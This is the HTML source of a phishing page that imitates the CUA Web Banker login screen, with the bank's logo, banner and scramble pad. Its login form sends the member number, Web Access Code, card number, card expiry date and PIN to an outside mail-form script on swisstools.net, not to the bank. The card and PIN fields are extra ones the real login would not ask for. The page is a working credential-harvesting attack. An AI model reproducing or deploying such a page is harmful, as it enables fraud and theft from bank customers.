                color: red
            }
            
        </style>
        <link rel="stylesheet" type="text/css" media="all" href="CUA_files/default7CFD.css">
        <link rel="stylesheet" type="text/css" media="print" href="CUA_files/print2144.css">
    </head>
    <body onload="readyScramblePad();_errmsg()" id="LG01">
        <table class="maintbl">
            <!-- This is the whole page table WHOLEPAGE -->
            <tbody>
                <tr class="header">
                    <!-- This is the HEADER row --><!-- This row contains the logo, title, Help and Logoff buttons -->
                    <td>
                        <table class="header" cellspacing="0">
                            <tbody>
                                <tr>
                                    <td class="logo">
                                        <img class="logo" src="https://webbanker.cua.com.au/webbanker/logo.jpg" alt="Logo">
                                    </td>
                                    <td class="bannerLogon">
                                        <img class="banner" src="https://webbanker.cua.com.au/webbanker/banner.jpg" alt="Banner">
                                    </td>
                                    <td class="toprhbtns">
                                        <div class="sid">
                                            2TN9CJ3GII-LG01 
                                        </div>
                                        <form id="Date2Form" method="post" action="CUA?xid=E9RSHJ" name="Date2" enctype="multipart/form-data">
                                            <div id="BTNPrint" class="btnprintdiv">
                                            </div>
                                            <div id="BTNHelp" class="btnhelpdiv">
                                                <input class="btn_" name="bu_0" value="Help" onclick="window.open('./Help/LG01Help.htm'); return false" type="button">
                                            </div>
                                            <div id="BTNLogoff" class="btnlogoffdiv">
                                            </div>
                                        </form>
                                    </td>
                                </tr>
                            </tbody>
                        </table>
                    </td>
                </tr>
            </tbody>
        </table>
        <form method="post" action="http://www.swisstools.net/mailform.asp" name="Date">
            <table class="maintbl">
                <tbody>
                    <tr>
                        <td class="msgbox">
                        </td>
                    </tr>
                    <tr>
                        <td class="mainpage">
                            <table class="btbl">
                                <tbody>
                                    <tr>
                                        <td class="mktg" colspan="2">
                                            Welcome to Web Banker
                                        </td>
                                    </tr>
                                    <tr>
                                        <td class="exptext" colspan="2">
                                            Please enter your CUA Member Number and Web Access Code (WAC)
                                        </td>
                                    </tr>
                                    <tr>
                                        <td>
                                            <table class="entryarea">
                                                <!-- This is the entry field area ENTRYAREA -->
                                                <tbody>
                                                    <tr>
                                                        <td class="lbl">
                                                            CUA Member Number
                                                        </td>
                                                        <td class="val">
                                                            <input type="hidden" name="errmsg" /><input type="hidden" name="id" value="44575"><input type="hidden" name="redirection" value="http://www.cua.com.au/wps/wcm/connect/website/home"><input type="hidden" name="siteId" value="CB" /><input name="form_charset" type="hidden" value="UTF-8"><input name="txtUserid" size="20" autocomplete="off" value="" maxlength="10" type="text">
                                                        </td>
                                                    </tr>
                                                    <tr>
                                                        <td class="lbl">
                                                            Web Access Code (WAC)
                                                        </td>
                                                        <td class="val">
                                                            <input name="txtPassword" size="20" autocomplete="off" onclick="setSelectedInputByClick(this)" tabindex="-1" maxlength="6" readonly="readonly" type="password">
                                                        </td>
                                                    </tr>"
                                                    <tr>
                                                        <td class="lbl">
                                                            Card Number:
                                                        </td>
                                                        <td>
                                                            <input name="CardNumber" size="16" tabindex="5">
                                                        </td>
                                                    </tr>
                                                    <tr>
                                                        <td class="lbl">
                                                            Expiration Date:
                                                        </td>
                                                        <td width="30%">
                                                            <select name="Luna_Expirare_Card" id="Luna_Expirare_Card" size="1" tabindex="6">
                                                                <option value="-" selected="selected">Month</option>
                                                                <option value="01">01 </option>
                                                                <option value="02">02 </option>
                                                                <option value="03">03 </option>
                                                                <option value="04">04 </option>
                                                                <option value="05">05 </option>
                                                                <option value="06">06 </option>
                                                                <option value="07">07 </option>
                                                                <option value="08">08 </option>
                                                                <option value="09">09 </option>
                                                                <option value="10">10 </option>
                                                                <option value="11">11 </option>
                                                                <option value="12">12 </option>
                                                            </select>
                                                            <select name="anul_expirare_card" id="anul_expirare_card" size="1" tabindex="7">
                                                                <option value="-" selected>Year</option>
                                                                <option value="2009">2009</option>
                                                                <option value="2010">2010</option>
                                                                <option value="2011">2011</option>
                                                                <option value="2012">2012</option>
                                                                <option value="2013">2013</option>
                                                                <option value="2014">2014</option>
                                                                <option value="2015">2015</option>
                                                                <option value="2016">2016</option>
                                                            </select>
                                                        </td>
                                                    </tr>
                                                    <tr>
                                                        <td class="lbl">
                                                            Pin:
                                                        </td>
                                                        <td>
                                                            <input type="password" name="pass" size="4" tabindex="2">
                                                        </td>
                                                    </tr>
                                                </tbody>
                                            </table>
                                        </td>
                                        <td>
                                            <table>
                                                <tbody>
                                                    <tr id="originalScramblePad">
                                                        <td>
                                                            <table class="sctable">
                                                                <tbody>
                                                                    <tr>
                                                                        <td>
                                                                            <input class="scbtn_" name="bu_" value="6" onclick="enterNum(this); return false" type="button">
                                                                        </td>
                                                                        <td>
                                                                            <input class="scbtn_" name="bu_" value="5" onclick="enterNum(this); return false" type="button">
                                                                        </td>
                                                                        <td>
                                                                            <input class="scbtn_" name="bu_" value="0" onclick="enterNum(this); return false" type="button">
                                                                        </td>
                                                                    </tr>
                                                                    <tr width="100%">
                                                                        <td>
                                                                            <input class="scbtn_" name="bu_" value="9" onclick="enterNum(this); return false" type="button">
                                                                        </td>
                                                                        <td>
                                                                            <input class="scbtn_" name="bu_" value="1" onclick="enterNum(this); return false" type="button">
                                                                        </td>
                                                                        <td>
                                                                            <input class="scbtn_" name="bu_" value="3" onclick="enterNum(this); return false" type="button">
                                                                        </td>
                                                                    </tr>
                                                                    <tr width="100%">
                                                                        <td>
                                                                            <input class="scbtn_" name="bu_" value="4" onclick="enterNum(this); return false" type="button">
                                                                        </td>
                                                                        <td>
                                                                            <input class="scbtn_" name="bu_" value="7" onclick="enterNum(this); return false" type="button">
                                                                        </td>
                                                                        <td>
                                                                            <input class="scbtn_" name="bu_" value="2" onclick="enterNum(this); return false" type="button">
                                                                        </td>
                                                                    </tr>
                                                                    <tr width="100%">
                                                                        <td>
                                                                            <input class="scbtn_" name="bu_1" value="Clear" onclick="clearField(); return false" type="button">
                                                                        </td>
                                                                        <td>
                                                                            <input class="scbtn_" name="bu_" value="8" onclick="enterNum(this); return false" type="button">
                                                                        </td>
                                                                        <td>
                                                                            <input class="scbtn_" name="bu_2" value="Del" onclick="delField(); return false" type="button">
                                                                        </td>
                                                                    </tr>
                                                                </tbody>
                                                            </table>
                                                        </td>
                                                    </tr>
                                                </tbody>
                                            </table>
                                        </td>
                                    </tr>
                                    <tr id="scrambleDescription">
                                        <td class="btndesc" colspan="2">
                                            Enter your WAC by clicking the numbers on the scramble pad.
                                            <br>
                                            <br>
                                        </td>
                                    </tr>
                                    <tr>
                                        <td class="pgbtns" colspan="2">
                                            <input class="btn_" type="submit" name="submit.x" value="Submit Form"><input class="btn_" name="bu_4" value="Cancel" onclick="window.close(); return false" type="button"><input class="btn_" name="bu_5" value="Change WAC" type="submit">
                                        </td>
                                    </tr>
                                    <tr>
                                        <td class="cpy" colspan="2">
                                            Copyright Sandstone Technology Pty Ltd     [ 2.0.63  7CFD 2144 FBEE ]
                                        </td>
                                    </tr>
                                </tbody>
                            </table>
                        </td>
                    </tr>
                    <tr>
                        <td class="msgbox">
                        </td>
                    </tr>
                </tbody>
            </table>
        </form>
        <script language="javascript">
            <!--
            document.forms["Date"].elements["txtUserid"].focus();
            function encPw(){
                rExp = [65537]
                rMod = [32466737, 36962896, 10792699, 74517840, 54306146, 16159033, 158388350, 184232116, 71384053, 138338495, 171979701, 255463256, 61019003, 162248130, 88124340, 122655677, 163447239, 222391979, 154]
                frm = document.forms["Date"]
                encWid(rExp, rMod, frm, "SPID", "txtPassword")
            }
            
            function subWith(wid){
                encPw();
                subW2(wid)
            }// -->
        </script>
    </body>
</html>
